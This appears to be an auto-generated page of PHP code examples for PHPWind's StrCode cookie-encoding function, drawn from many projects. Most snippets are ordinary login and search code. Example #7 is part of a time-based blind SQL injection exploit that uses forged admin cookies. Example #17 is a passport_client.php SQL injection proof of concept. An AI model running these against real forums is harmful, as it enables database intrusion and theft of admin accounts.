PHP StrCodeの例

コード例 #1

ファイル: class_User.php プロジェクト: adi00/wumaproject

 function synlogin($user)
 {
     global $timestamp, $uc_key;
     list($winduid, $windid, $windpwd) = explode("\t", $this->base->strcode($user, false));
     header('P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"');
     $safecv = '';
     $cktime = 31536000;
     $cktime != 0 && ($cktime += $timestamp);
     Cookie("winduser", StrCode($winduid . "\t" . PwdCode($windpwd) . "\t" . $safecv), $cktime);
     Cookie("ucuser", StrCode($winduid . "\t" . md5($uc_key . $windpwd)), $cktime);
     Cookie('lastvisit', '', 0);
     return '';
 }

コード例 #2

ファイル: pwbbs5.php プロジェクト: GHubgenius/qbbj

/**
*取得用户数据
**/
function PassportUserdb()
{
    global $db, $timestamp, $webdb, $onlineip, $TB, $pre, $db_ifsafecv, $userDB;
    list($lfjuid, $lfjpwd, $safecv) = explode("\t", StrCode(GetCookie('winduser'), 'DECODE'));
    if (!$lfjuid || !$lfjpwd) {
        return '';
    }
    if ($db_ifsafecv) {
        $SQL = ",M.safecv";
    }
    $detail = $userDB->get_allInfo($lfjuid);
    if (PwdCode($detail[password]) != $lfjpwd || $db_ifsafecv && $safecv != $detail['safecv']) {
        return;
    }
    return $detail;
}

コード例 #3

ファイル: class_User.php プロジェクト: jechiy/PHPWind

 function synlogin($user)
 {
     global $timestamp, $uc_key;
     list($winduid, $windid, $windpwd) = explode("\t", $this->base->strcode($user, false));
     header('P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"');
     $safecv = '';
     $cktime = 31536000;
     $cktime != 0 && ($cktime += $timestamp);
     Cookie("winduser", StrCode($winduid . "\t" . PwdCode($windpwd) . "\t" . $safecv), $cktime);
     Cookie("ucuser", StrCode($winduid . "\t" . md5($uc_key . $windpwd)), $cktime);
     Cookie('lastvisit', '', 0);
     //鑾峰彇鍕嬬珷_start
     require_once R_P . 'require/functions.php';
     doMedalBehavior($winduid, 'continue_login');
     //鑾峰彇鍕嬬珷_end
     return '';
 }

コード例 #4

ファイル: wap_mod.php プロジェクト: adi00/wumaproject

function wap_login($username, $password, $safecv, $lgt = 0)
{
    global $db, $timestamp, $onlineip, $db_ckpath, $db_ckdomain, $db_bbsurl, $db_ifsafecv;
    $men = $db->get_one("SELECT m.uid,m.password,m.safecv,m.groupid,m.yz,md.onlineip FROM pw_members m LEFT JOIN pw_memberdata md ON md.uid=m.uid WHERE m." . ($lgt ? 'uid' : 'username') . "=" . pwEscape($username));
    if ($men) {
        $e_login = explode("|", $men['onlineip']);
        if ($e_login[0] != $onlineip . ' *' || $timestamp - $e_login[1] > 600 || $e_login[2] > 1) {
            $men_uid = $men['uid'];
            $men_pwd = $men['password'];
            $check_pwd = $password;
            if ($men['yz'] > 2) {
                wap_msg('login_jihuo');
            }
            if (strlen($men_pwd) == 16) {
                $check_pwd = substr($password, 8, 16);
                /*支持 16 位 md5截取密码*/
            }
            if ($men_pwd == $check_pwd && (!$db_ifsafecv || $men['safecv'] == $safecv)) {
                if (strlen($men_pwd) == 16) {
                    $db->update("UPDATE pw_members SET password="******" WHERE uid=" . pwEscape($men_uid));
                }
                $L_groupid = (int) $men['groupid'];
                Cookie("ck_info", $db_ckpath . "\t" . $db_ckdomain);
            } else {
                global $L_T;
                $L_T = $e_login[2];
                $L_T ? $L_T-- : ($L_T = 5);
                $F_login = "******";
                $db->update("UPDATE pw_memberdata SET onlineip=" . pwEscape($F_login) . " WHERE uid=" . pwEscape($men_uid));
                wap_msg('login_pwd_error');
            }
        } else {
            global $L_T;
            $L_T = 600 - ($timestamp - $e_login[1]);
            wap_msg('login_forbid');
        }
    } else {
        global $errorname;
        $errorname = $username;
        wap_msg('user_not_exists');
    }
    Cookie("winduser", StrCode($men_uid . "\t" . PwdCode($password) . "\t" . $safecv));
    Cookie('lastvisit', '', 0);
    wap_msg('wap_login', 'index.php');
}

コード例 #5

ファイル: phpwind.php プロジェクト: shenhua4286/gxw

function API_Login($user, $pass)
{
    global $Block, $setting, $onlineip, $_COOKIE, $_SERVER;
    $pwd = md5($pass);
    $user = Conn()->record("members", "uid,username,password,safecv", "username='******' and password='******'");
    if (!$user) {
        return false;
    }
    $winduid = $user[0]['uid'];
    $windpwd = md5($_SERVER['HTTP_USER_AGENT'] . $pwd . $GLOBALS['db_hash']);
    $safecv = $user[0]['safecv'];
    $username = $user[0]['username'];
    $winduser = StrCode(stripSlashes("{$winduid}\t{$windpwd}\t{$safecv}"), "ENCODE");
    $GLOBALS['cookiepre'] = substr(md5($GLOBALS['db_sitehash']), 0, 5) . '_';
    osetcookie('winduser', $winduser, 31536000);
    osetcookie('ck_info', $GLOBALS['db_ckpath'] . "\t" . $GLOBALS['db_ckdomain'], 31536000);
    osetcookie('lastvisit', '', 0);
    $GLOBALS['cookiepre'] = 'onez_';
    osetcookie('userid', $winduid, 31536000);
    osetcookie('username', $username, 31536000);
    return 'Y';
}

コード例 #6

ファイル: postactivity.class.php プロジェクト: jechiy/PHPWind

 function getSearchvalue($field, $type, $alltidtype = false, $backtype = false)
 {
     /*获取搜索结果*/
     global $db_perpage, $page, $actmid, $fid, $basename;
     $field = unserialize(StrCode($field, 'DECODE'));
     $sqladd = '';
     $defaultValueTableName = getActivityValueTableNameByActmid();
     $fid && ($sqladd .= " {$defaultValueTableName}.fid=" . S::sqlEscape($fid));
     $fielddb = PW_PostActivity::getFieldData($actmid, $type);
     if ($actmid) {
         $userDefinedTableName = getActivityValueTableNameByActmid($actmid, 1, 1);
     } else {
         $userDefinedTableName = '';
     }
     foreach ($field as $key => $value) {
         if ($value) {
             if ($fielddb[$key]['ifdel']) {
                 $tableName = $userDefinedTableName . '.';
             } elseif ($fielddb[$key]) {
                 $tableName = $defaultValueTableName ? $defaultValueTableName . '.' : '';
             } else {
                 continue;
             }
             if (in_array($fielddb[$key]['type'], array('number', 'radio', 'select'))) {
                 $sqladd .= $sqladd ? " AND " . $tableName . $fielddb[$key]['fieldname'] . "=" . S::sqlEscape($value) : $tableName . $fielddb[$key]['fieldname'] . "=" . S::sqlEscape($value);
             } elseif ($fielddb[$key]['type'] == 'checkbox') {
                 $checkboxs = '';
                 foreach ($value as $cv) {
                     $checkboxs .= $checkboxs ? ',' . $cv : $cv;
                 }
                 $value = '%,' . $checkboxs . ',%';
                 $sqladd .= $sqladd ? " AND " . $tableName . $fielddb[$key]['fieldname'] . " LIKE(" . S::sqlEscape($value) . ")" : $tableName . $fielddb[$key]['fieldname'] . " LIKE(" . S::sqlEscape($value) . ")";
             } elseif ($fielddb[$key]['type'] == 'calendar') {
                 $value && ($value = PwStrtoTime($value));
                 if (strpos($fielddb[$key]['fieldname'], 'start') !== false) {
                     $sqladd .= $sqladd ? " AND " . $tableName . $fielddb[$key]['fieldname'] . ">=" . S::sqlEscape($value) : $tableName . $fielddb[$key]['fieldname'] . ">=" . S::sqlEscape($value);
                 } elseif (strpos($fielddb[$key]['fieldname'], 'end') !== false) {
                     $starttimeFlag = substr($fielddb[$key]['fieldname'], 0, -7) . 'starttime';
                     if ($value <= PwStrtoTime($field[$starttimeFlag]) && $field[$starttimeFlag]) {
                         Showmsg('calendar_error');
                     }
                     $sqladd .= $sqladd ? " AND " . $tableName . $starttimeFlag . "<=" . S::sqlEscape($value) : $tableName . $starttimeFlag . "<=" . S::sqlEscape($value);
                 } else {
                     $sqladd .= $sqladd ? " AND " . $tableName . $fielddb[$key]['fieldname'] . ">=" . S::sqlEscape($value['start']) . " AND " . $tableName . $fielddb[$key]['fieldname'] . "<=" . S::sqlEscape($value['end']) : $tableName . $fielddb[$key]['fieldname'] . ">=" . S::sqlEscape($value['start']) . " AND " . $tableName . $fielddb[$key]['fieldname'] . "<=" . S::sqlEscape($value['end']);
                 }
             } elseif (in_array($fielddb[$key]['type'], array('text', 'url', 'email', 'textarea'))) {
                 $value = '%' . $value . '%';
                 $sqladd .= $sqladd ? " AND " . $tableName . $fielddb[$key]['fieldname'] . " LIKE(" . S::sqlEscape($value) . ")" : $tableName . $fielddb[$key]['fieldname'] . " LIKE(" . S::sqlEscape($value) . ")";
             } elseif ($fielddb[$key]['type'] == 'range' && $value['min'] && $value['max']) {
                 $sqladd .= $sqladd ? " AND " . $tableName . $fielddb[$key]['fieldname'] . ">=" . S::sqlEscape($value['min']) . " AND " . $tableName . $fielddb[$key]['fieldname'] . "<=" . S::sqlEscape($value['max']) : $tableName . $fielddb[$key]['fieldname'] . ">=" . S::sqlEscape($value['min']) . " AND " . $tableName . $fielddb[$key]['fieldname'] . "<=" . S::sqlEscape($value['max']);
             } else {
                 $sqladd .= '';
             }
         }
     }
     if ($sqladd) {
         !$page && ($page = 1);
         $start = ($page - 1) * $db_perpage;
         $limit = S::sqlLimit($start, $db_perpage);
         $actmidSql = $actmid ? "AND actmid=" . S::sqlEscape($actmid) : '';
         $sqladd .= $sqladd ? " AND {$defaultValueTableName}.ifrecycle=0 " . $actmidSql : " {$defaultValueTableName}.ifrecycle=0 " . $actmidSql;
         $count = $this->db->get_value("SELECT COUNT(*) as count FROM {$defaultValueTableName} " . ($userDefinedTableName ? "LEFT JOIN {$userDefinedTableName} USING (tid)" : "") . " WHERE {$sqladd}");
         $query = $this->db->query("SELECT tid \n\t\t\t\t\t\t\t\t\tFROM {$defaultValueTableName} " . ($userDefinedTableName ? "LEFT JOIN {$userDefinedTableName} USING (tid)" : "") . " \n\t\t\t\t\t\t\t\t\tWHERE {$sqladd} {$limit}");
         while ($rt = $this->db->fetch_array($query)) {
             $tiddb[] = $rt['tid'];
         }
         if ($alltidtype) {
             $query = $this->db->query("SELECT tid FROM {$defaultValueTableName} " . ($userDefinedTableName ? "LEFT JOIN {$userDefinedTableName} USING (tid)" : "") . " WHERE {$sqladd}");
             while ($rt = $this->db->fetch_array($query)) {
                 $alltiddb[] = $rt['tid'];
             }
         }
         !$count && ($count = -1);
     } else {
         if ($backtype) {
             adminmsg('topic_search_none', "{$basename}&action=topic&actmid={$actmid}");
         }
         Showmsg('topic_search_none');
     }
     return array($count, $tiddb, $alltiddb);
 }

コード例 #7

ファイル: 2759.php プロジェクト: noscripter/exploit-database

        if ($i == 255) {
            die("\nExploit failed...");
        }
    }
    $j++;
}
$j = 1;
$admin = "";
while (!strstr($admin, chr(0))) {
    for ($i = 0; $i <= 255; $i++) {
        $sql = "9999999'/**/OR/**/(IF((ASCII(SUBSTRING(username," . $j . ",1))=" . $i . "),benchmark(" . $b . ",char(0)),-1))/**/AND/**/groupid=3/**/LIMIT/**/1/*";
        echo "sql -> " . $sql . "\n";
        $packet = "GET " . $p . "admin.php HTTP/1.0\r\n";
        $packet .= "CLIENT-IP: 1.2.3.4\r\n";
        $packet .= "Host: " . $host . "\r\n";
        $packet .= "Cookie: " . $cp . "AdminUser="******"9999999999\t" . $sql, "ENCODE") . ";\r\n";
        $packet .= "Accept: text/plain\r\n";
        $packet .= "Connection: Close\r\n\r\n";
        $packet .= $data;
        sendpacketii($packet);
        usleep(2000000);
        $starttime = time();
        echo "starttime -> " . $starttime . "\r\n";
        sendpacketii($packet);
        $endtime = time();
        echo "endtime -> " . $endtime . "\r\n";
        $difftime = $endtime - $starttime;
        echo "difftime -> " . $difftime . "\r\n";
        if ($difftime > $timeout) {
            $admin .= chr($i);
            echo "admin -> " . $admin . "[???]\r\n";

コード例 #8

ファイル: ck.php プロジェクト: adi00/wumaproject

 function cookie($code)
 {
     global $timestamp;
     Cookie('cknum', StrCode($timestamp . "\t\t" . md5($code . $timestamp)));
 }

コード例 #9

ファイル: postcate.php プロジェクト: adi00/wumaproject

     $searchhtml .= '</span>';
     $asearchhtml .= '</span>';
     if (strpos($searchhtml, '</span></span>') !== false) {
         $searchhtml = str_replace('</span></span>', '</span>', $searchhtml);
     }
     if (strpos($asearchhtml, '</span></span>') !== false) {
         $asearchhtml = str_replace('</span></span>', '</span>', $asearchhtml);
     }
     $pcid = (int) $pcid;
     $pcvaluetable = GetPcatetable($pcid);
 }
 if ($step == 'search') {
     require_once R_P . 'lib/postcate.class.php';
     $searchPostcate = new postCate($field);
     if (!$newfield) {
         $newfield = StrCode(serialize($field));
     }
     list($count, $tiddb, $alltiddb) = $searchPostcate->getSearchvalue($newfield, 'one', true, true);
     is_array($tiddb) && ($sql .= " AND pv.tid IN(" . pwImplode($tiddb) . ")");
     is_array($alltiddb) && ($alltids = implode(',', $alltiddb));
 }
 if ($step != 'search' || !$count) {
     $alltiddb = $threadb = $newtiddb = array();
     $alltiddb = array();
     $query = $db->query("SELECT tid FROM {$pcvaluetable} WHERE ifrecycle=0");
     while ($rt = $db->fetch_array($query)) {
         $alltiddb[] = $rt['tid'];
     }
     if ($alltiddb) {
         $query = $db->query("SELECT tid FROM pw_threads WHERE tid IN(" . pwImplode($alltiddb) . ")");
         while ($rt = $db->fetch_array($query)) {

コード例 #10

ファイル: area_thread.php プロジェクト: jechiy/PHPWind

             $db->free_result($query);
         }
         unset($toptids, $L, $limit, $toppeddb);
     } else {
         list($st, $lt, $asc, $R) = getstart($start_limit - $rows, $asc, $count);
         $limit2 = S::sqlLimit($st, $lt);
     }
     unset($rows);
 } else {
     list($st, $lt, $asc, $R) = getstart($start_limit, $asc, $count);
     $limit2 = S::sqlLimit($st, $lt);
 }
 if ($limit2) {
     if ($topicsearch == 1) {
         S::gp(array('searchname', 'new_searchname'));
         $searchname && ($new_searchname = StrCode(serialize($searchname)));
         if ($modelid > 0) {
             list($count, $tiddb, $alltiddb) = $postTopic->getSearchvalue($new_searchname, 'one', true);
         } elseif ($pcid > 0) {
             list($count, $tiddb, $alltiddb) = $postCate->getSearchvalue($new_searchname, 'one', true);
         }
         if ($tiddb) {
             $query = $db->query("SELECT * FROM pw_threads WHERE tid IN (" . S::sqlImplode($tiddb) . ")");
             $urladd = "&topicsearch=1&new_searchname={$new_searchname}";
             while ($thread = $db->fetch_array($query)) {
                 $tpcdb[] = $thread;
             }
             $db->free_result($query);
         }
     } else {
         $topadd && ($topadd .= $R ? ' ASC,' : ' DESC,');

コード例 #11

ファイル: wap_mod.php プロジェクト: jechiy/PHPWind

/**
 * 会员唯一有效登录验证字串解密
 * @param string $token 有效登录验证字串
 * @param int $curtimes 当前该字串已经登录访问次数
 * @return mixed 验证通过则返回有效字串,否则返回FALSE
 */
function deWindToken($token, $curtimes = 60)
{
    $token = StrCode($token, 'DECODE');
    list($expire, $times, $code, $md5word) = explode("\t", $token);
    if (substr(md5($expire . $code . $times), 8, 18) === $md5word && $times >= $curtimes && $expire >= time() && $code) {
        return addslashes($code);
    }
    return '';
}

コード例 #12

ファイル: funuser_phpwind7.php プロジェクト: thu0ng91/jmc

/**
 * 用户接口，退出处理
 * 
 * @param      array       $params 参数数组
 * 必须参数： $params['username'] - 用户名,$params['password'] - 密码,$params['email'] - 邮箱
 * @access     public
 * @return     int    
 */
function jieqi_ulogout_iprocess(&$params)
{
    //赋值
    $userdb['uid'] = $_SESSION['jieqiUserId'];
    //用户编号
    $userdb['username'] = $_SESSION['jieqiUserUname'];
    //用户名
    $userdb['password'] = '';
    //密码
    $userdb['email'] = $_SESSION['jieqiUserEmail'];
    //邮箱
    /*
    $userdb['rvrc']		= $params['rvrc'];//威望
    $userdb['money']	= $params['money'];//铜币
    $userdb['credit']	= $params['credit'];//贡献值
    $userdb['currency']	= $params['currency'];//银元
    */
    $userdb['time'] = time();
    //时间
    $userdb['cktime'] = 'F';
    if (!empty($_REQUEST['forward'])) {
        $params['jumpurl'] = $_REQUEST['forward'];
    }
    //字符串化用户基本信息
    $userdb_encode = '';
    foreach ($userdb as $key => $val) {
        $userdb_encode .= $userdb_encode ? "&{$key}={$val}" : "{$key}={$val}";
    }
    //加密数据
    $userdb_encode = str_replace('=', '', StrCode($userdb_encode));
    //加密字串
    $verify = md5('quit' . $userdb_encode . $params['jumpurl'] . PHPWIND_PASSPORT_KEY);
    header('Location: ' . PHPWIND_PASSPORT_URL . '/passport_client.php?action=quit&userdb=' . rawurlencode($userdb_encode) . '&forward=' . rawurlencode($params['jumpurl']) . '&verify=' . rawurlencode($verify));
    return true;
}

コード例 #13

ファイル: checkcode.class.php プロジェクト: sherlockhouse/aliyun

 function cookie($code)
 {
     global $timestamp;
     Cookie('cknum', StrCode($timestamp . "\t\t" . md5($code . $timestamp . getHashSegment())));
 }

コード例 #14

ファイル: passport_client.php プロジェクト: YouthAndra/huaitaoo2o

$forward = isset($_POST['forward']) ? $_POST['forward'] : $_GET['forward'];
$verify = isset($_POST['verify']) ? $_POST['verify'] : $_GET['verify'];
$forward = str_replace('=', '=', $forward);
$config['phpwind'] = jconf::get('phpwind');
$key = $config['phpwind']['pw_pptkey'];
if (md5($action . $userdb . urldecode($forward) . $key) == $verify) {
    $config = jconf::get();
    $db_charset = strtolower(str_replace('-', '', $config['charset']));
    if (!defined('JSG_DB_CHARSET')) {
        define("JSG_DB_CHARSET", $db_charset);
    }
    $db_prefix = $config['db_table_prefix'];
    if (!defined('JSG_DB_PRE')) {
        define("JSG_DB_PRE", $db_prefix);
    }
    parse_str(StrCode($userdb, $key, 'DECODE'), $userdb);
    if ($action == 'login') {
        $userdb = escapeChar($userdb);
        if (is_array($userdb) && $userdb['username'] && $userdb['password']) {
            synlogin($userdb['username'], $userdb['password']);
        }
    }
    if ($action == 'quit') {
        synlogout();
    }
}
header('Location: ' . $forward);
exit;
function escapeChar($mixed, $isint = false, $istrim = false)
{
    if (is_array($mixed)) {

コード例 #15

ファイル: weibologin.php プロジェクト: sherlockhouse/aliyun

function processLogin($userId, $user = null, $cktime = '31536000', $lgt = 0)
{
    global $timestamp, $db_ckpath, $db_ckdomain, $db_autoban;
    if (!$user) {
        $userService = L::loadClass('UserService', 'user');
        /* @var $userService PW_UserService */
        $user = $userService->get($userId, true, true);
    }
    $pwuser = $user['username'];
    $md5_pwpwd = $user['password'];
    $safecv = $user['safecv'];
    require_once R_P . 'require/checkpass.php';
    $logininfo = checkpass($pwuser, $md5_pwpwd, $safecv, $lgt);
    if (!is_array($logininfo)) {
        Showmsg($logininfo);
    }
    list($winduid, , $windpwd, ) = $logininfo;
    /*update cache*/
    $_cache = getDatastore();
    $_cache->delete("UID_" . $winduid);
    $cktime != 0 && ($cktime += $timestamp);
    Cookie("winduser", StrCode($winduid . "\t" . $windpwd . "\t" . $safecv), $cktime);
    Cookie("ck_info", $db_ckpath . "\t" . $db_ckdomain);
    Cookie('lastvisit', '', 0);
    //将$lastvist清空以将刚注册的会员加入今日到访会员中
    //自动获取勋章_start
    require_once R_P . 'require/functions.php';
    doMedalBehavior($winduid, 'continue_login');
    //自动获取勋章_end
    if ($db_autoban) {
        require_once R_P . 'require/autoban.php';
        autoban($winduid);
    }
    return $logininfo;
}

コード例 #16

ファイル: registercheck.class.php プロジェクト: sherlockhouse/aliyun

 /**
  * 校验验证问题
  * @param $anser 答案
  * @param $question 问题
  * @return int
  */
 function checkQanswer($answer, $question)
 {
     global $db_answer;
     if (!$question || $question > 0 && $answer != $db_answer[$question] || $question < 0 && !SafeCheck(explode("\t", StrCode(GetCookie('ckquestion'), 'DECODE')), $answer, 'ckquestion', 1800, false, false)) {
         return 1;
     } else {
         return 0;
     }
 }

コード例 #17

ファイル: phpwind5.x passport_client.php UPDATE SQL Injection POC.php プロジェクト: Hacker-One/exp

//[fix]:http://www.phpwind.net/read-htm-tid-392683.html
//CODE IN require\defend.php[line 8-15]
//foreach($_GET as $_key=>$_value){
// !ereg("^\_",$_key) && !isset($$_key) && $$_key=$_GET[$_key];
//}
//$passport_ifopen = $passport_type = $passport_key = ''; //<--------here!!!!
//require_once(D_P.'data/bbscache/config.php');
//if($db_forcecharset && !defined('W_P')){
// @header("Content-Type: text/html; charset=$db_charset");
//}
////////////////////////////////////////////////////
$passwod = '123456789';
$passport_key = '6f0xuRI8Cd8iga';
$forward = " http://localhost/PHPWind5.0.1/upload/index.php";
$userdb = "time=99999999999999999&username=heige111&password="******"passport_client.php?passport_type=client&passport_ifopen=1&action=login&forward=" . urlencode($forward) . "&passport_key=" . $passport_key . "&verify=" . $verify . "&userdb=" . urlencode($userdb);
function StrCode($string, $action = 'ENCODE')
{
    $GLOBALS['db_hash'] = '6f0xuRI8Cd8iga';
    $key = substr(md5($_SERVER["HTTP_USER_AGENT"] . $GLOBALS['db_hash']), 8, 18);
    //$key = '6f0xuRI8Cd8iga'; [当时误把$key当作了$passport_key]
    $string = $action == 'ENCODE' ? $string : base64_decode($string);
    $len = strlen($key);
    $code = '';
    for ($i = 0; $i < strlen($string); $i++) {
        $k = $i % $len;
        $code .= $string[$i] ^ $key[$k];
    }
    $code = $action == 'DECODE' ? $code : base64_encode($code);

コード例 #18

ファイル: info_safe.php プロジェクト: jechiy/PHPWind

        }
        //update meminfo
        if ($upmeminfo) {
            updateThreadTrade($upmeminfo, $winduid);
        }
        unset($upmemdata, $upmeminfo);
        $result = $userService->update($winduid, $pwSQL);
        // defend start
        CloudWind::yunUserDefend('editprofile', $winduid, $windid, $upmemdata['pwdctime'], 0, 101, '', '', '', array('profile' => array_keys($pwSQL)));
        // defend end
        /* platform weibo app */
        $siteBindService = L::loadClass('WeiboSiteBindService', 'sns/weibotoplatform/service');
        /* @var $siteBindService PW_WeiboSiteBindService */
        if ($siteBindService->isOpen() && $upmembers['password']) {
            $weiboLoginService = L::loadClass('WeiboLoginService', 'sns/weibotoplatform/service');
            /* @var $weiboLoginService PW_WeiboLoginService */
            $weiboLoginService->setLoginUserPasswordHasReset($winduid);
            Cookie("winduser", StrCode($winduid . "\t" . PwdCode($upmembers['password']) . "\t" . $upmembers['safecv']));
            Cookie("ck_info", $db_ckpath . "\t" . $db_ckdomain);
            Cookie('lastvisit', '', 0);
            //自动获取勋章_start
            require_once R_P . 'require/functions.php';
            doMedalBehavior($winduid, 'continue_login');
            //自动获取勋章_end
        }
        //* $_cache = getDatastore();
        //* $_cache->delete('UID_'.$winduid);
        initJob($winduid, "doUpdatedata");
        refreshto("profile.php?action=modify&info_type={$info_type}", 'operate_success', 2, true);
    }
}

コード例 #19

ファイル: register.php プロジェクト: jechiy/PHPWind

     } else {
         pwCache::setData(D_P . 'data/bbscache/ip_cache.php', "<?php die;?><{$timestamp}>\n<{$onlineip}>");
     }
 }
 //addonlinefile();
 if (GetCookie('userads') && $inv_linkopen && $inv_linktype == '1') {
     require_once R_P . 'require/userads.php';
 }
 if (GetCookie('o_invite') && $db_modes['o']['ifopen'] == 1) {
     list($o_u, $hash, $app) = explode("\t", GetCookie('o_invite'));
     if (is_numeric($o_u) && strlen($hash) == 18) {
         require_once R_P . 'require/o_invite.php';
     }
 }
 if ($rgyz == 1) {
     Cookie("winduser", StrCode($winduid . "\t" . PwdCode($windpwd) . "\t" . $safecv));
     Cookie("ck_info", $db_ckpath . "\t" . $db_ckdomain);
     Cookie('lastvisit', '', 0);
     //将$lastvist清空以将刚注册的会员加入今日到访会员中
     /*连续登录天数*/
     if ($db_md_ifopen) {
         require_once R_P . 'require/functions.php';
         doMedalBehavior($winduid, 'continue_login');
     }
 }
 //发送短消息
 if ($rg_config['rg_regsendmsg']) {
     $rg_config['rg_welcomemsg'] = str_replace('$rg_name', $regname, $rg_config['rg_welcomemsg']);
     M::sendNotice(array($windid), array('title' => "Welcome To[{$db_bbsname}]!", 'content' => $rg_config['rg_welcomemsg']));
 }
 //发送邮件

コード例 #20

ファイル: ucuseradd.php プロジェクト: sherlockhouse/aliyun

<?php

!defined('P_W') && exit('Forbidden');
if (empty($detail) && GetCookie('ucuser')) {
    require_once R_P . 'uc_client/uc_client.php';
    list($winduid, $md5pwd) = explode("\t", addslashes(StrCode(GetCookie('ucuser'), 'DECODE')));
    $detail = uc_user_check($winduid, $md5pwd);
}
if ($detail['uid'] > 0) {
    $register = L::loadClass('Register', 'user');
    $register->appendUser($detail['uid'], $detail['username'], $detail['password'], $detail['email']);
    $detail = getUserByUid($detail['uid']);
}

コード例 #21

ファイル: weibobind.php プロジェクト: jechiy/PHPWind

function weiboResetUserPassword($userId, $password, $repeatPassword)
{
    global $db_ckpath, $db_ckdomain;
    if ('' == $password || '' == $repeatPassword) {
        Showmsg('创建密码不能为空');
    }
    $rg_config = L::reg();
    list($rg_regminpwd, $rg_regmaxpwd) = explode("\t", $rg_config['rg_pwdlen']);
    $register = L::loadClass('Register', 'user');
    $register->checkPwd($password, $repeatPassword);
    $weiboLoginService = L::loadClass('WeiboLoginService', 'sns/weibotoplatform/service');
    /* @var $weiboLoginService PW_WeiboLoginService */
    $isSuccess = $weiboLoginService->resetLoginUserPassword($userId, $password);
    if (!$isSuccess) {
        return false;
    }
    $userService = L::loadClass('UserService', 'user');
    /* @var $userService PW_UserService */
    $user = $userService->get($userId);
    Cookie("winduser", StrCode($userId . "\t" . PwdCode($user['password']) . "\t" . $user['safecv']));
    Cookie("ck_info", $db_ckpath . "\t" . $db_ckdomain);
    Cookie('lastvisit', '', 0);
    //自动获取勋章_start
    require_once R_P . 'require/functions.php';
    doMedalBehavior($userId, 'continue_login');
    //自动获取勋章_end
    return true;
}

コード例 #22

ファイル: bbsclose.php プロジェクト: sherlockhouse/aliyun

<?php

!function_exists('readover') && exit('Forbidden');
$bbsclose = true;
$AdminUser = GetCookie('AdminUser');
$CK = $AdminUser ? explode("\t", StrCode(GetCookie('AdminUser'), 'DECODE')) : array();
if (S::inArray($CK[1], $manager)) {
    $v_key = array_search($CK[1], $manager);
    SafeCheck($CK, PwdCode($manager_pwd[$v_key])) && ($bbsclose = false);
}
if (!$db_bbsifopen) {
    if ($_GET['logined'] && !$bbsclose) {
        Cookie('logined', 1, $timestamp + 1800);
    } elseif (!GetCookie('logined') || $bbsclose) {
        $skin = $skinco ? $skinco : $db_defaultstyle;
        $groupid = '';
        Showmsg($db_whybbsclose, $bbsclose ? NULL : 'bbsclose');
    }
} elseif ($db_bbsifopen == 2) {
    if ($db_visitopen) {
        $tmpAllowvisit = false;
        if ($db_visitips && $onlineip != 'Unknown') {
            $tmpIP = ip2long($onlineip);
            if ($tmpIP != -1 && $tmpIP !== FALSE) {
                $tmpVisitips = explode(',', $db_visitips);
                foreach ($tmpVisitips as $value) {
                    if (!trim($value)) {
                        continue;
                    }
                    $tmpSIP = ip2long(str_replace('*', '1', $value));
                    $tmpEIP = ip2long(str_replace('*', '255', $value));

コード例 #23

ファイル: posttopic.class.php プロジェクト: sherlockhouse/aliyun

 function getSearchvalue($field, $type, $alltidtype = false, $backtype = false)
 {
     /*获取搜索结果*/
     global $db_perpage, $page, $modelid, $fid, $basename;
     $field = unserialize(StrCode($field, 'DECODE'));
     $sqladd = '';
     $fid && ($sqladd .= " fid=" . S::sqlEscape($fid));
     $fielddb = postTopic::getFieldData($modelid, $type);
     foreach ($field as $key => $value) {
         if ($value) {
             if (in_array($fielddb[$key]['type'], array('number', 'radio', 'select'))) {
                 $sqladd .= $sqladd ? " AND " . $fielddb[$key]['fieldname'] . "=" . S::sqlEscape($value) : $fielddb[$key]['fieldname'] . "=" . S::sqlEscape($value);
             } elseif ($fielddb[$key]['type'] == 'checkbox') {
                 $checkboxs = '';
                 foreach ($value as $cv) {
                     $checkboxs .= $checkboxs ? ',' . $cv : $cv;
                 }
                 $value = '%,' . $checkboxs . ',%';
                 $sqladd .= $sqladd ? " AND " . $fielddb[$key]['fieldname'] . " LIKE(" . S::sqlEscape($value) . ")" : $fielddb[$key]['fieldname'] . " LIKE(" . S::sqlEscape($value) . ")";
             } elseif ($fielddb[$key]['type'] == 'calendar' && ($value['start'] || $value['end'])) {
                 $value['start'] && ($value['start'] = PwStrtoTime($value['start']));
                 $value['end'] && ($value['end'] = PwStrtoTime($value['end']));
                 if ($value['start'] > $value['end'] && $value['start'] && $value['end']) {
                     Showmsg('calendar_error');
                 }
                 $sqladd .= $sqladd ? " AND " . $fielddb[$key]['fieldname'] . ">=" . S::sqlEscape($value['start']) . " AND " . $fielddb[$key]['fieldname'] . "<=" . S::sqlEscape($value['end']) : $fielddb[$key]['fieldname'] . ">=" . S::sqlEscape($value['start']) . " AND " . $fielddb[$key]['fieldname'] . "<=" . S::sqlEscape($value['end']);
             } elseif (in_array($fielddb[$key]['type'], array('text', 'url', 'email', 'textarea'))) {
                 $value = '%' . $value . '%';
                 $sqladd .= $sqladd ? " AND " . $fielddb[$key]['fieldname'] . " LIKE(" . S::sqlEscape($value) . ")" : $fielddb[$key]['fieldname'] . " LIKE(" . S::sqlEscape($value) . ")";
             } elseif ($fielddb[$key]['type'] == 'range' && $value['min'] && $value['max']) {
                 $sqladd .= $sqladd ? " AND " . $fielddb[$key]['fieldname'] . ">=" . S::sqlEscape($value['min']) . " AND " . $fielddb[$key]['fieldname'] . "<=" . S::sqlEscape($value['max']) : $fielddb[$key]['fieldname'] . ">=" . S::sqlEscape($value['min']) . " AND " . $fielddb[$key]['fieldname'] . "<=" . S::sqlEscape($value['max']);
             } else {
                 $sqladd .= '';
             }
         }
     }
     if ($sqladd) {
         !$page && ($page = 1);
         $start = ($page - 1) * $db_perpage;
         $limit = S::sqlLimit($start, $db_perpage);
         $tablename = GetTopcitable($modelid);
         $sqladd .= $sqladd ? " AND ifrecycle=0" : " ifrecycle=0";
         $count = $this->db->get_value("SELECT COUNT(*) as count FROM {$tablename} WHERE {$sqladd}");
         $query = $this->db->query("SELECT tid FROM {$tablename} WHERE {$sqladd} {$limit}");
         while ($rt = $this->db->fetch_array($query)) {
             $tiddb[] = $rt['tid'];
         }
         if ($alltidtype) {
             $query = $this->db->query("SELECT tid FROM {$tablename} WHERE {$sqladd}");
             while ($rt = $this->db->fetch_array($query)) {
                 $alltiddb[] = $rt['tid'];
             }
         }
         !$count && ($count = -1);
